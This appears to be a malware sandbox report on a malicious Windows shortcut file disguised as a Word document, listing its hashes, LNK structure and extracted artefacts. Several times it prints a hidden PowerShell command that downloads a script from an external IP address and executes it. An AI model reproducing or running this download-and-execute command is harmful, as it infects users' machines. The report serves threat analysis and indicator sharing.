Malicious

44e17e2ef1329ae5ca1ddbfbb8df1f1c

LNK File
|
MD5: 44e17e2ef1329ae5ca1ddbfbb8df1f1c
|
Size: 7.03 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	44e17e2ef1329ae5ca1ddbfbb8df1f1c
Sha1	9ce6cc6f52d8c6ad4d3dc973bc63bcc31e157afe
Sha256	4055212f6c3ddf1bbf99775b0f70a52801a9e8eeb7c4c0f89a1569531f662bb8
Sha384	6d2de76410c4b91b0c1756077396acebdbcecd2fec7f31b29407f4c54b59da25f883015529bf84b2bd8a5e0846a86593
Sha512	745c0b2681c6dd00eb881b0745669182a69aa3a535e8b7807e0ce9e4375787d16a59a50a3a73a74022c078cf34c46c36db6431c7c05b58045b0c2d7b3daeddfd
SSDeep	24:8d/WiU53zfpUhkiYIvqluNBP4DnPCfHzOD:8lWiozfpk6IGuNBPEPkzOD
TLSH	28E16B1022F54604F0B7CF38AA3777A0D972B90AEE29ABCD4214B00D5D30B20D565F2F

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -w Hidden $w = New-Object Net.WebClient; $w.Headers.Add('User-Agent', 'UA WindowsPowerShell'); . ([ScriptBlock]::Create($w.DownloadString('http://193.238.152.123/Dossto4ka/airportfledgling.ps1')))
Deobfuscated PowerShell	-w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://193.238.152.123/Dossto4ka/airportfledgling.ps1")))
Deobfuscated PowerShell	shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "1/29/2026" "3:08:23" "PM" accesstime: "1/29/2026" "3:08:23" "PM" writetime: "1/29/2026" "3:08:23" "PM" filesize: 0 0 iconindex: 97 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "MS" "W??rd" "Docum??nt" workingdir: "%APPDATA%" commandlinearguments: -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://193.238.152.123/Dossto4ka/airportfledgling.ps1"))) iconlocation: "imageres.dll"

44e17e2ef1329ae5ca1ddbfbb8df1f1c (7.03 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -w Hidden $w = New-Object Net.WebClient; $w.Headers.Add('User-Agent', 'UA WindowsPowerShell'); . ([ScriptBlock]::Create($w.DownloadString('http://193.238.152.123/Dossto4ka/airportfledgling.ps1'))) Malicious	44e17e2ef1329ae5ca1ddbfbb8df1f1c
Deobfuscated PowerShell	-w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://193.238.152.123/Dossto4ka/airportfledgling.ps1"))) Malicious	44e17e2ef1329ae5ca1ddbfbb8df1f1c > LNK CommandLine
Deobfuscated PowerShell	shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "1/29/2026" "3:08:23" "PM" accesstime: "1/29/2026" "3:08:23" "PM" writetime: "1/29/2026" "3:08:23" "PM" filesize: 0 0 iconindex: 97 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "MS" "W??rd" "Docum??nt" workingdir: "%APPDATA%" commandlinearguments: -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://193.238.152.123/Dossto4ka/airportfledgling.ps1"))) iconlocation: "imageres.dll" Malicious	44e17e2ef1329ae5ca1ddbfbb8df1f1c > [Lnk Summary]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙